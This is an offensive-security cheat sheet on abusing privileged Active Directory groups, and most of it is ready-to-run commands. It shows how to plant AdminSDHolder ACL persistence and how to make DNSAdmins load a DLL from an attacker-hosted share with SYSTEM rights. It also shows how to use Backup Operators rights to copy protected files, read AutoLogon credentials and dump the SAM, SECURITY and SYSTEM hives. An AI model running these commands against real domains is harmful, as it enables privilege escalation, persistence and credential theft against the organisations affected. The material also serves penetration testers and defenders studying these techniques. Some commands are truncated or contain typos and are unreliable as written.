Skip to content

Active Directory - Groups

Dangerous Built-in Groups Usage

If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System or set "dminCount attribute to 0 for the required object.

The AdminCount attribute is set to 1 automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).

Find users with AdminCount=1.

netexec ldap -u username -p password --admin-count
# or
bloodyAD --host -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName
# or
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
# or
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
# or

AdminSDHolder Attribute

The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.

If you modify the permissions of AdminSDHolder, that permission template will be pushed out to all protected accounts automatically by SDProp (in an hour). E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group. * Windows/Linux:

bloodyAD --host -d example.lab -u john -p pass123 add genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john

# Clean up after
bloodyAD --host -d example.lab -u john -p pass123 remove genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
* Windows only:
# Add a user to the AdminSDHolder group:
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose

# Right to reset password for toto using the account titi
Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword

# Give all rights
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All

DNS Admins Group

It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM).

⚠ Require privileges to restart the DNS service.

  • Enumerate members of DNSAdmins group
  • Windows/Linux:
    bloodyAD --host -d example.lab -u john -p pass123 get object DNSAdmins --attr msds-memberTransitive
  • Windows only:
    Get-NetGroupMember -GroupName "DNSAdmins"
    Get-ADGroupMember -Identity DNSAdmins
  • Change dll loaded by the DNS service
    # with RSAT
    dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
    dnscmd /config /serverlevelplugindll \\\exploit\privesc.dll
    # with DNSServer module
    $dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
    $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
    Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
  • Check the previous command success
    Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
  • Restart DNS
    sc \\dc01 stop dns
    sc \\dc01 start dns

Schema Admins Group

The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.

Backup Operators Group

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.

This groups grants the following privileges : - SeBackup privileges - SeRestore privileges

  • Get members of the group:
  • Windows/Linux:
    bloodyAD --host -d example.lab -u john -p pass123 get object "Backup Operators" --attr msds-memberTransitive
  • Windows only:
    PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
  • Enable privileges using giuliano108/SeBackupPrivilege
    Import-Module .\SeBackupPrivilegeUtils.dll
    Import-Module .\SeBackupPrivilegeCmdLets.dll
  • Retrieve sensitive files
    Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
  • Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
    $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
    $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
    $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
  • Retrieve SAM,SECURITY and SYSTEM hives
  • mpgn/BackupOperatorToDA: .\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\\SHARE\
  • improsec/BackupOperatorToolkit: .\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK